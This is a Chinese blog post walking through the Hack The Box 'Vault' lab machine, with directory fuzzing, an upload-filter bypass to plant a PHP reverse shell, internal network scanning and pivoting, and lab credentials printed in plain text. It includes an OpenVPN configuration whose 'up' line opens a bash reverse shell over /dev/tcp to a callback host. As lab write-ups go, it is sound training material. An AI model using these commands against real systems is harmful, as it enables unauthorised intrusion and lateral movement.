<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="htb walkthrough,">










<meta name="description" content="基本信息收集扫描靶机端口信息  开放了22和80端口。访问80端口web如下  利用网站信息生成字典，爆破网站子目录： 12cewl 10.10.10.109 | tr &amp;apos;A-Z&amp;apos; &amp;apos;a-z&amp;apos; &amp;gt; vault_dict.txtwfuzz -u 10.10.10.109/FUZZ -w vault_dict.txt --hc=403,404  访问spa">
<meta name="keywords" content="htb walkthrough">
<meta property="og:type" content="article">
<meta property="og:title" content="htb-vault-walkthrough">
<meta property="og:url" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/index.html">
<meta property="og:site_name" content="Ha0Za1-Pages">
<meta property="og:description" content="基本信息收集扫描靶机端口信息  开放了22和80端口。访问80端口web如下  利用网站信息生成字典，爆破网站子目录： 12cewl 10.10.10.109 | tr &amp;apos;A-Z&amp;apos; &amp;apos;a-z&amp;apos; &amp;gt; vault_dict.txtwfuzz -u 10.10.10.109/FUZZ -w vault_dict.txt --hc=403,404  访问spa">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/nmap_target_machine.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/website_sparklays.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/wfuzz_main_website.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/wfuzz_main_website_r2.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/design_html.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/change_logo_php.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/burpsuite-php5.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/get_php_reverse_shell.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/dave_desktop.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/arp_net.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/nc_port_scan.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/ssh_port_forwarding_8080.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/vpn_config_php.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/get_shell_and_usertxt.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/4_route.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/auth_log_file_in_4.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/nmap_5_2_source_4444.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/nc_5_2_987.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/ncat_ncat_ssh.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/netstat_122_4.png">
<meta property="og:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/gpg_decryrpt_get_root_txt.png">
<meta property="og:updated_time" content="2019-05-09T01:57:57.594Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="htb-vault-walkthrough">
<meta name="twitter:description" content="基本信息收集扫描靶机端口信息  开放了22和80端口。访问80端口web如下  利用网站信息生成字典，爆破网站子目录： 12cewl 10.10.10.109 | tr &amp;apos;A-Z&amp;apos; &amp;apos;a-z&amp;apos; &amp;gt; vault_dict.txtwfuzz -u 10.10.10.109/FUZZ -w vault_dict.txt --hc=403,404  访问spa">
<meta name="twitter:image" content="http://yoursite.com/2019/05/09/htb-vault-walkthrough/nmap_target_machine.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/05/09/htb-vault-walkthrough/">





  <title>htb-vault-walkthrough | Ha0Za1-Pages</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ha0Za1-Pages</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/05/09/htb-vault-walkthrough/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ha0Za1">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.JPG">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ha0Za1-Pages">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">htb-vault-walkthrough</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-05-09T09:22:35+08:00">
                2019-05-09
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="基本信息收集"><a href="#基本信息收集" class="headerlink" title="基本信息收集"></a>基本信息收集</h2><p>扫描靶机端口信息</p>
<p><img src="nmap_target_machine.png" alt="nmap_target_machine"></p>
<p>开放了22和80端口。访问80端口web如下</p>
<p><img src="website_sparklays.png" alt="website_80"></p>
<p>利用网站信息生成字典，爆破网站子目录：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cewl 10.10.10.109 | tr &apos;A-Z&apos; &apos;a-z&apos; &gt; vault_dict.txt</span><br><span class="line">wfuzz -u 10.10.10.109/FUZZ -w vault_dict.txt --hc=403,404</span><br></pre></td></tr></table></figure>
<p><img src="wfuzz_main_website.png" alt="wfuzz_website"></p>
<p>访问<strong>sparklays</strong>，拒绝访问。继续爆破<strong>sparklays</strong>子目录</p>
<p><img src="wfuzz_main_website_r2.png" alt="wfuzz_main_website_r2"></p>
<p>访问 <strong>sparklays/design/design.html</strong> :</p>
<p><img src="design_html.png" alt="design_html"></p>
<p>点击<strong>change logo</strong>，跳转到如下页面，要求上传文件：</p>
<p><img src="change_logo_php.png" alt="change_logo_php"></p>
<h2 id="10-10-10-109-shell"><a href="#10-10-10-109-shell" class="headerlink" title="10.10.10.109 shell"></a>10.10.10.109 shell</h2><p>猜测存在文件上传漏洞，尝试上传<strong>php-reverse-shell</strong>，利用<strong>burpsuite-intruder</strong>爆破文件类型：</p>
<p><img src="burpsuite-php5.png" alt="intruder-php"></p>
<p><strong>.php5</strong>可成功绕过上传限制~</p>
<p><strong>nc</strong>本地监听，成功获得回连shell：</p>
<p><img src="get_php_reverse_shell.png" alt="get_php_shell"></p>
<p>在<strong>Desktop</strong>找到三个重要文件：</p>
<p><img src="dave_desktop.png" alt="dave_desktop"></p>
<p>利用ssh信息成功登陆到该机器<code>10.10.10.109</code>：</p>
<h2 id="192-168-122-4-shell"><a href="#192-168-122-4-shell" class="headerlink" title="192.168.122.4 shell"></a>192.168.122.4 shell</h2><p><strong>arp</strong>发现内网其他靶机信息如下：</p>
<p><img src="arp_net.png" alt="arp_net"></p>
<p>当然，也可以利用ping来探测内网主机：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for i in &#123;1..255&#125;; do ping -c 1 192.168.122.$i | grep &apos;from&apos; ; done</span><br></pre></td></tr></table></figure></p>
<p>对内网<code>192.168.122.4</code>机器，利用<code>nc</code>完成端口扫描：</p>
<p><code>nc -v -z 192.168.122.4 1-100 2&gt;&amp;1 | grep succeed</code></p>
<p><img src="nc_port_scan.png" alt="NC_PORT_SCAN"></p>
<p>发现22和80端口开放，为方便访问80端口，利用<code>10.10.10.109</code>做一个SSH隧道，实现本地端口转发：</p>
<p><img src="ssh_port_forwarding_8080.png" alt="local_port_forwarding"></p>
<p>这样本机访问8080端口即相当于访问内网<code>192.168.122.4:80</code></p>
<p>点击<strong>vpn configuration</strong>进入如下页面：</p>
<p><img src="vpn_config_php.png" alt="vpn_config_web"></p>
<p>简单做一次子目录爆破，发现了<strong>notes</strong>文件，提示如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod 123.ovpn and script.sh to 777</span><br></pre></td></tr></table></figure>
<p>说明通过页面输入vpn配置信息会写入文件，并且可执行</p>
<p>在网上查阅到如下资料：</p>
<p><a href="https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da" target="_blank" rel="noopener">Reverse Shell from an OpenVPN Configuration File</a></p>
<p>构造vpn配置文件如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">remote 192.168.122.1</span><br><span class="line">ifconfig 10.200.0.2 10.200.0.1</span><br><span class="line">dev tun</span><br><span class="line">script-security 2</span><br><span class="line">nobind</span><br><span class="line">up ​&quot;/bin/bash -c &apos;/bin/bash -i &gt; /dev/tcp/192.168.122.1/9003 0&lt;&amp;1 2&gt;&amp;1&amp;&apos;&quot;</span><br></pre></td></tr></table></figure>
<p>在<code>192.168.122.1即(10.10.10.109)</code>上成功获取到<code>192.168.122.4</code>的shell</p>
<p>并且在<strong>Desktop</strong>上拿到<strong>user.txt</strong></p>
<p><img src="get_shell_and_usertxt.png" alt="get_shell_and_user_txt"></p>
<h2 id="192-168-5-2-shell"><a href="#192-168-5-2-shell" class="headerlink" title="192.168.5.2 shell"></a>192.168.5.2 shell</h2><p>查看<code>192.168.122.4</code>机器的路由信息：</p>
<p><img src="4_route.png" alt="route_info"></p>
<p>猜测在<code>192.168.5.0/24</code>网段内还有机器，查看日志发现如下ip地址<code>192.168.5.2</code>及相关信息</p>
<p><img src="auth_log_file_in_4.png" alt="auth_log_file_4"></p>
<p>最后三行记录引起了注意，以4444为源端口，扫描一下目标机器端口信息，发现了开放的987端口：</p>
<p><img src="nmap_5_2_source_4444.png" alt="nmap_5_2_4444"></p>
<p><strong>nc</strong>以4444源端口连过去发现987端口是ssh服务:</p>
<p><img src="nc_5_2_987.png" alt="nc_5_2"></p>
<p>根据日志记录最后三行的提示，在<code>192.168.122.4</code>的1234端口上进行监听，当接收到连接时，执行脚本<code>ncat 192.168.5.2 987 -p 53</code></p>
<p>然后在<code>192.168.122.4</code>，根据发现的ssh文件的内容<code>dave:dav3gerous567</code>，ssh登陆本地的1234端口：</p>
<p><img src="ncat_ncat_ssh.png" alt="ncat_ncat_ssh"></p>
<p>此时，成功获取到<code>192.168.5.2</code>的shell，而<code>192.168.122.4</code>的网络端口状态如下：</p>
<p><img src="netstat_122_4.png" alt="netstat_122_4"></p>
<p>在<code>192.168.5.2</code>上发现<strong>root.txt.gpg</strong>文件:</p>
<p>查看文件发现是gpg加密的文件</p>
<p>直接解密不成功，提示其密钥ID为<strong>D1EB1F03</strong></p>
<p>回想一下，我们曾在<code>10.10.10.109</code>的机器上发现key文件，搜索一下，果然在该机器上找到了GPG密钥</p>
<p>将<strong>root.txt.gpg</strong>文件以<strong>base32</strong>编码为媒介，拉到<code>10.10.10.109</code>上</p>
<p>进行解密，输入key文件<code>itscominghome</code></p>
<p>成功拿到root.txt的flag</p>
<p><img src="gpg_decryrpt_get_root_txt.png" alt="gpg_decrypt_get_root_txt"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/htb-walkthrough/" rel="tag"># htb walkthrough</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/06/weblogic-CNVD-C-2019-48814/" rel="next" title="weblogic-CNVD-C-2019-48814">
                <i class="fa fa-chevron-left"></i> weblogic-CNVD-C-2019-48814
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/05/09/htb-blue-walkthrough/" rel="prev" title="htb-blue-walkthrough">
                htb-blue-walkthrough <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.JPG" alt="Ha0Za1">
            
              <p class="site-author-name" itemprop="name">Ha0Za1</p>
              <p class="site-description motion-element" itemprop="description">余不等伞，亦不等雨停</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">29</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Mo7Laviiin" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#基本信息收集"><span class="nav-number">1.</span> <span class="nav-text">基本信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#10-10-10-109-shell"><span class="nav-number">2.</span> <span class="nav-text">10.10.10.109 shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#192-168-122-4-shell"><span class="nav-number">3.</span> <span class="nav-text">192.168.122.4 shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#192-168-5-2-shell"><span class="nav-number">4.</span> <span class="nav-text">192.168.5.2 shell</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">mo7laviiin</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
